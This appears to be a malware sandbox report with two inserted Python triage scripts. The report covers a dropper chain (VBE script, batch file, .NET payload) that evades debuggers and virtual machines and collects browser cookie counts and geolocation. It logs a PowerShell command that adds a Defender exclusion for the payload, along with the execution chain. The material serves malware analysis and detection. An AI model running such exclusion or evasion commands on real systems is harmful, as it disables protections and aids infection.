                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 590359Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 590250Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 590140Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 590031Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 589912Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 589781Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 589671Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 589562Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\wscript.exe  Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 6810
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 2811
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe  Window / User API: threadDelayed 3433
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe  Window / User API: threadDelayed 6232
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe  Dropped PE file which has not been started (6 files, all under C:\Users\user\Desktop\): jYCYFtEB.log, GYwcCMoE.log, WzsROUza.log, pQfxiZJp.log, vJIWLFOd.log, UFpBXUVk.log
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe  Dropped PE file which has not been started (6 files, all under C:\Users\user\Desktop\): QRPSxHgy.log, aEtIhTbg.log, HnGdNOQQ.log, vCAeICGo.log, YuXIhBvf.log, ZlAIxOci.log
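The twelve dropped files above are PE images written to the Desktop under a .log extension, which is why the sandbox flags them as "dropped PE file" even though nothing executed them. The following is an added triage example, not code from the Joe Sandbox report or from the sample: it walks a directory, checks each file for a DOS "MZ" header whose e_lfanew points at a valid "PE\0\0" signature, and reports files that are PE images but carry a non-executable extension. The sample directory, the header-only PE stub and the file names it uses are constructed for the demonstration; the extension list is an assumption and should be tuned to the environment.

```python
"""Find PE images hiding behind non-executable extensions (added example)."""
import struct
import tempfile
from pathlib import Path

# Extensions that legitimately hold PE images. Anything else that parses
# as PE is worth a look. Assumption: adjust for your estate (e.g. .bin).
PE_EXTENSIONS = {".exe", ".dll", ".sys", ".scr", ".ocx", ".cpl", ".drv", ".efi", ".mui"}


def is_pe(path):
    """True if the file starts with an MZ header whose e_lfanew (offset 0x3C)
    points at the 'PE\\0\\0' signature. Reads only the bytes it needs, so it is
    cheap to run over a whole profile directory."""
    try:
        with open(path, "rb") as f:
            dos = f.read(0x40)                       # IMAGE_DOS_HEADER is 64 bytes
            if len(dos) < 0x40 or dos[:2] != b"MZ":
                return False
            (e_lfanew,) = struct.unpack_from("<I", dos, 0x3C)
            if e_lfanew < 0x40:                      # NT header cannot overlap the DOS header
                return False
            f.seek(e_lfanew)
            return f.read(4) == b"PE\0\0"
    except OSError:
        return False


def find_masquerading_pes(root):
    """Return sorted paths under root that are PE images without a PE extension."""
    hits = []
    for p in Path(root).rglob("*"):
        if p.is_file() and p.suffix.lower() not in PE_EXTENSIONS and is_pe(p):
            hits.append(p)
    return sorted(hits)


def make_minimal_pe(path):
    """Write a header-only PE stub: constructed test fixture, not a runnable binary."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    with open(path, "wb") as f:
        f.write(bytes(dos) + b"PE\0\0" + b"\0" * 20)


def demo():
    """Build a throwaway Desktop with one masquerading PE, one honest PE,
    one real text log and one 'MZ'-prefixed non-PE; return the names flagged."""
    with tempfile.TemporaryDirectory() as d:
        desk = Path(d) / "Desktop"
        desk.mkdir()
        make_minimal_pe(desk / "jYCYFtEB.log")       # PE hiding behind .log (name from the report)
        make_minimal_pe(desk / "tool.exe")           # PE with an honest extension: not flagged
        (desk / "notes.log").write_text("plain text log\n")
        (desk / "mzonly.log").write_bytes(b"MZ" + b"\0" * 100)  # MZ but no PE signature
        return [p.name for p in find_masquerading_pes(desk)]


if __name__ == "__main__":
    print(demo())
```

On a live host, run `find_masquerading_pes` against the user's profile rather than the whole volume first; the Desktop and Temp paths in this report are where both droppers wrote their payloads.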
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe TID: 7900  Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8068  Thread sleep count: 6810 > 30; 2811 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7196  Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 7240  Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412  Thread sleep time (each >= -30000s, in report order): -23980767295822402s; -600000s; -599869s; -598640s; -598469s; -598297s; -597469s; -596890s; -596757s; -596500s; -596105s; -595851s; -595703s; -595504s; -595359s; -595249s; -595138s; -595031s; -594797s; -594656s; -594526s; -594417s; -594305s; -594169s; -594043s; -593922s; -593797s; -593663s; -593484s; -593193s; -593069s; -592858s; -592750s; -592640s; -592531s; -592422s; -592302s; -592172s; -592062s; -591953s; -591843s; -591734s; -591612s; -591485s; -591359s; -591250s; -591140s; -591031s; -590921s; -590812s; -590703s; -590594s; -590469s; -590359s; -590250s; -590140s; -590031s; -589912s; -589781s; -589671s; -589562s
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 1420  Thread sleep time: -10800000s >= -30000s; -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 7384  Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7400  Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 7628  Thread sleep time: -922337203685477s >= -30000s
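Two things in the sleep evidence above are worth pulling out. The value 922337203685477 is .NET's TimeSpan.MaxValue expressed in milliseconds (Int64.MaxValue ticks divided by 10,000), so those threads are parked indefinitely rather than delayed; and thread 4412 issues dozens of roughly ten-minute sleeps (600000, 599869, ...), which adds up to hours of wall-clock time, far beyond any sandbox run. The following added example, not part of the Joe Sandbox report, parses evidence rows in exactly this format, aggregates them per process and thread, and labels each thread. It assumes the numeric values are milliseconds (the report prints "s", but 600000 is consistent with a ten-minute Sleep call), treats anything at or beyond TimeSpan.MaxValue as a parked thread, and reuses the report's own 30000 threshold; the sample rows are constructed from the lines above and the one-hour cut-off is illustrative.

```python
"""Triage helper for Joe Sandbox thread-sleep evidence (added example)."""
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# .NET TimeSpan.MaxValue in milliseconds (Int64.MaxValue ticks / 10_000).
# A delay this large never elapses: the thread is parked, not timed.
TIMESPAN_MAX_MS = 922_337_203_685_477
# Threshold the report itself compares against ("... >= -30000s").
THRESHOLD_MS = 30_000
HOUR_MS = 3_600_000  # illustrative cut-off for "hours of sleep"

# Assumption: the value is milliseconds even though the report prints "s".
# "\s*" tolerates the extracted rows where the TID and the text run together.
SLEEP_RE = re.compile(
    r"Source: (?P<src>.+?) TID: (?P<tid>\d+)\s*Thread sleep time: "
    r"-(?P<value>\d+)s >= -\d+s"
)
COUNT_RE = re.compile(
    r"Source: (?P<src>.+?) TID: (?P<tid>\d+)\s*Thread sleep count: "
    r"(?P<value>\d+) > \d+"
)

# Constructed sample: rows copied from the evidence above, one per pattern.
SAMPLE_LINES = r"""
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -23980767295822402s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -599869s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 1420Thread sleep time: -10800000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 7384Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7400Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8068Thread sleep count: 6810 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8068Thread sleep count: 2811 > 30
"""


def parse_evidence(text):
    """Return (process, tid, kind, value) tuples; kind is 'time' (ms) or 'count'."""
    records = []
    for line in text.splitlines():
        m, kind = SLEEP_RE.search(line), "time"
        if m is None:
            m, kind = COUNT_RE.search(line), "count"
        if m is None:
            continue                                    # not a sleep evidence row
        proc = PureWindowsPath(m["src"]).name.lower()
        records.append((proc, int(m["tid"]), kind, int(m["value"])))
    return records


def summarize(records, threshold_ms=THRESHOLD_MS):
    """Aggregate per (process, tid): total timed sleep, sleeps at/over the
    threshold, the largest loop count seen, and whether the thread is parked."""
    out = defaultdict(lambda: {"total_ms": 0, "long_sleeps": 0,
                               "loop_count": 0, "parked": False})
    for proc, tid, kind, value in records:
        entry = out[(proc, tid)]
        if kind == "count":
            entry["loop_count"] = max(entry["loop_count"], value)
        elif value >= TIMESPAN_MAX_MS:
            entry["parked"] = True                      # infinite wait, not a timed delay
        else:
            entry["total_ms"] += value
            if value >= threshold_ms:
                entry["long_sleeps"] += 1
    return dict(out)


def tags(entry):
    """Label a thread summary the way an analyst reads it; may carry several tags."""
    t = []
    if entry["parked"]:
        t.append("parked")
    if entry["total_ms"] >= HOUR_MS:
        t.append("hours-of-sleep")
    elif entry["long_sleeps"]:
        t.append("long-sleep")
    if entry["loop_count"] > 30:
        t.append("sleep-loop")
    return t or ["benign"]


if __name__ == "__main__":
    summary = summarize(parse_evidence(SAMPLE_LINES))
    for key, entry in sorted(summary.items(), key=lambda kv: -kv[1]["total_ms"]):
        print(key, round(entry["total_ms"] / 60_000, 1), "min", tags(entry))
```

Note that svchost.exe's single 30 s sleep trips the same threshold as the payload's ten-minute loops; the threshold is a filter, not a verdict, and the per-thread totals and the parked flag are what separate the two.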
Source: C:\Windows\System32\svchost.exe  File opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exe  Last function: Thread delayed (reported twice)
Source: C:\Windows\System32\PING.EXE  Last function: Thread delayed
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe  File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe  File Volume queried: C:\ FullSizeInformation (reported three times)
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00E3A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_00E3A69B
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00E4C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_00E4C220
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00E4E6A3 VirtualQuery,GetSystemInfo, 0_2_00E4E6A3
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 30000Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 600000Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 599869Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 598640Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 598469Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 598297Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 597469Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 596890Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 596757Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 596500Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 3600000Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 596105Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 595851Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 595703Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 595504Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 595359Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 595249Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 595138Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 595031Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 594797Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 594656Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 594526Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 594417Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 594305Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 594169Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 594043Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 593922Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 300000Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 593797Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 593663Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 593484Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 593193Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 593069Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 592858Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 592750Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 592640Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 592531Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Thread delayed: delay time: 592422
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Thread delayed: delay time: 592302
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Thread delayed: delay time: 592172
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Thread delayed: delay time: 592062
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Thread delayed: delay time: 591953
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Thread delayed: delay time: 591843
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Thread delayed: delay time: 591734
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Thread delayed: delay time: 591612
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Thread delayed: delay time: 591485
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Thread delayed: delay time: 591359
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Thread delayed: delay time: 591250
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Thread delayed: delay time: 591140
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Thread delayed: delay time: 591031
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Thread delayed: delay time: 590921
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Thread delayed: delay time: 590812
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Thread delayed: delay time: 590703
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Thread delayed: delay time: 590594
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Thread delayed: delay time: 590469
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Thread delayed: delay time: 590359
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Thread delayed: delay time: 590250
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Thread delayed: delay time: 590140
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Thread delayed: delay time: 590031
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Thread delayed: delay time: 589912
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Thread delayed: delay time: 589781
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Thread delayed: delay time: 589671
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Thread delayed: delay time: 589562
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Thread delayed: delay time: 922337203685477
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | File opened: C:\Users\user
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | File opened: C:\Users\user\AppData
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | File opened: C:\Users\user\AppData\Local
Source: wscript.exe, 00000001.00000003.1761409239.0000000000850000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000012.00000002.2910275758.00000181EF858000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.2910214045.00000181EF842000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.2908176167.00000181EA22B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2907348176.000000000165D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: file.exe, chainportruntimeCrtMonitor.exe.0.dr, kahKUDRlEYHfKIalWlM.exe.4.dr | Binary or memory string: GfgiOL4kQeMUghnPQxcH
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-25012
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Process information queried: ProcessInformation
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Code function: 4_2_00007FFD9B94340A rdtsc
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E4F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E57DEE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E5C030 GetProcessHeap
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E4F9D5 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E4FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E58EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe'
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\MsContainer\P69CZ8d7qXWcyOsB66pHSLt72y6yplqEAs.vbe"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\MsContainer\GHGhSTUsO1Bq4f5yX2eWVB.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\MsContainer\chainportruntimeCrtMonitor.exe "C:\MsContainer/chainportruntimeCrtMonitor.exe"
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\hlVW2PE0oG.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe "C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe"
Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.000000000370E000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003837000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003DAA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program ManagerH
Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.000000000370E000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003790000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003529000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003837000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003DAA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: [{"Has Crypto Wallets (fff5)":"N","Crypto Extensions (fff5)":"N","Crypto Clients (fff5)":"N","Cookies Count (1671)":"25","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"?","Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N"},"5.0.4",5,1,"","user","045012","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Users\\user\\AppData\\Local\\Temp","Unknown (Unknown)","Unknown (Unknown)","Program Manager","8.46.123.228","US / United States","New York / New York","40.7123 / -74.0068"]
Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003DAA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: [{"Has Crypto Wallets (fff5)":"N","Crypto Extensions (fff5)":"N","Crypto Clients (fff5)":"N","Cookies Count (1671)":"25","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"?","Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N"},"5.0.4",5,1,"","user","045012","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Users\\user\\AppData\\Local\\Temp","Unknown (Unknown)","Unknown (Unknown)","Program Manager","8.46.123.228","US / United States","New York / New York","p
Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.000000000370E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: [{"Has Crypto Wallets (fff5)":"N","Crypto Extensions (fff5)":"N","Crypto Clients (fff5)":"N","Cookies Count (1671)":"25","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"?","Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N"},"5.0.4",5,1,"","user","045012","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Users\\user\\AppData\\Local\\Temp","Unknown (Unknown)","Unknown (Unknown)","Program Manager","8.46.123.228","US / United States","New York / New York","40.7123 / -74.0068"](
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E4F654 cpuid
Source: C:\Users\user\Desktop\file.exe | Code function: GetLocaleInfoW,GetNumberFormatW 0_2_00E4AF0F
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Queries volume information: C:\MsContainer\chainportruntimeCrtMonitor.exe VolumeInformation
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
